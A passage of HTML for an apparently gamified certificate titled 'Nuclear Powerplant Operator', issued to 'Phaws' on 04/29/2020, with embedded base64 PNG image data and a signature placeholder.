pzSg0hj2QEOO59FxrRM/d3b3JlXL1gYjuCOorv6gv2I/8Qt4luPDBis49emGCjRDC5+R4ATd+umM+gIL/oLyOpVaXVhgK36a/81E+RfA7m4B7x2YoLBE54N85JiPXvDZUqEwRFc5VMLRnfqw+vwAuutCaAIggBorgaBxvH9q+XG0RLiLhA3O0LgFvEr2CvBfzDaTN5W8yHhq27gXnAKeleh+J6DhsXaxt1eRIOC6aKlomcHSQaNZpxsaofBqU2Tp1fa0KcNgTKKBa8rxM0SJtf7ZbzMZyRbwajBdUHA3z/qlHYBf/iFZoQ12Ty5oq0LvMmBmWX1a8wkG5auJkRWNx2mJDdMJLaKiR1SfIMDP2e9ukqD86+P4k1DXjDwL6LvGy7rS7gplcykD/q4aZv2BZY2NVBNmV+VmJ8qrR6EdX0cLjnn1i2F3UJRRfWhL1bl+AhAaqjqLAI64YqeZa0m7kssdx4L8YQVahgk7O8GJcpUgYHF8BYOdrciTn5n0X3DnMhLK3vlD8UVlYyBCKJSN/JLY3ZG8foAmokjhNv57XQ4BxU2h4kJnsIbQp09rlQmQ/CbjCU7cgpOlWA2nYvTA4Q9nm7VVw1icfp1KnySGJPqFsbtDwOfJETfiFSSovVtvsvKOCxYeM7k3Jh3qMtcmObYVGzOcQhBiKwedNsbuW5sZBQBNrPZmZFOPCP/C2J1NtgjyW5wO/1rF8cgqM8BljTYNF41Ln66aMjQcrbCpG1SDzDAS/DCHcAscQg+aJZ5ISQMLBL+ShqVp9Mtk96BlE+J4j7+ieF2v0DysIMgNTgFfw2wyDqvD+FWs8hfvomlM2Op1bd+3FcerFxa4gn+qUk5tU9v75bF7RYjAEsn5QAL6q7/fZtzma9YtgPUnZPjgjU7RmzUJZWWxcbYEBqr54o/AazqpHNjz1ZDK62jgl8juCiHMO5jmvuvUcHo4bFYC+8oxa84Itqkix4fCerLcIkb2BHP6Q/TbXTzRoDrZnWZA+RCrqL7mu05WI/QLZXevAs2M7onbNTi+jYDX2NstO51ZbMYNfqugErdGlu0bqzd5lcZ31MiDjz+u2EV2Lou/oG0mI7nkLgC0+LRTSMCDrTUZssfBfPVlEkEj1bJZTaRCk7ZB6JixGQa+rAFYrV81XWHsLAbDmx1IWdlfKrtDOVTYkuPBnzXWB6saerNgcjywtwU1QIxpuc56xWGQmSq6ObO6CEBUKxo4Mh15JZGD8pbXlYzKxXXQv2B2L5Jj4VNL2yo1SiJ7EW9z+IP7DFj1Yt2Ea9KC/1K7Flk88fFtBiPmbdTL0NVM6aJxg+CF8/8HWcjrbwcDxZsAAAAldEVYdGRhdGU6Y3JlYXRlADIwMTgtMDQtMjZUMDI6MDA6MDUrMDA6MDCfmxfiAAAAJXRFWHRkYXRlOm1vZGlmeQAyMDE4LTA0LTI2VDAyOjAwOjA1KzAwOjAw7savXgAAAABJRU5ErkJggg==" class="sc-jTzLTM gdVHeQ" style="max-width: 110px;" /><h2 class="sc-bZQynM hJaChX" style="font-size: 18.4px; font-weight: normal; font-style: italic; line-height: 1.76; -webkit-letter-spacing: -0.1px; -moz-letter-spacing: -0.1px; -ms-letter-spacing: -0.1px; letter-spacing: -0.1px; color: #2c2b3f; margin: 25px 0 0 0;" > Nuclear Powerplant Operator</h2><p class="sc-gzVnrw gsQrMB" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; margin: 0;" > Issued to</p><h3 class="sc-htoDjs kQAJr" style="font-weight: normal; line-height: 1.38; -webkit-letter-spacing: -0.1px; -moz-letter-spacing: -0.1px; -ms-letter-spacing: -0.1px; letter-spacing: -0.1px; color: #d52c1e; margin: 0 0 10px 0; font-size: 46.4px; font-family: LucidaGrande; line-height: 0.7; -webkit-letter-spacing: -00.2px; -moz-letter-spacing: -00.2px; -ms-letter-spacing: -00.2px; letter-spacing: -00.2px; margin: 35px 0 40px 0; text-transform: uppercase;" > Phaws</h3><div class="sc-dnqmqq bDsesi"><div class="sc-gpHHfC hrlnEG" style="display: inline-block; margin-right: 35px; margin-bottom: 15px;" ><div class="sc-gVyKpa gMtABg" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0;" > Issue date</div><div class="sc-gVyKpa sc-eXNvrr btZsLP" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; color: #2c2b3f;" > 04/29/2020</div></div><div class="sc-gpHHfC hrlnEG" style="display: inline-block; margin-right: 35px; margin-bottom: 15px;" ><div class="sc-gVyKpa gMtABg" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0;" > Expiration date</div><div class="sc-gVyKpa sc-eXNvrr btZsLP" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; color: #2c2b3f;" > None</div></div> <img src="%ISSUER_SIGNATURE%" class="sc-fjdhpX hrCbRC" style="display: inline-block; max-width: 113px; max-height: 50px" /></div><p class="sc-VigVT kAqoHM" style="font-size: 14px; line-height: 1.36; color: #bababa; margin: 15px 0 27px 0;" > Operators know how to run the plant.</p> <img src="data:image/png;base64,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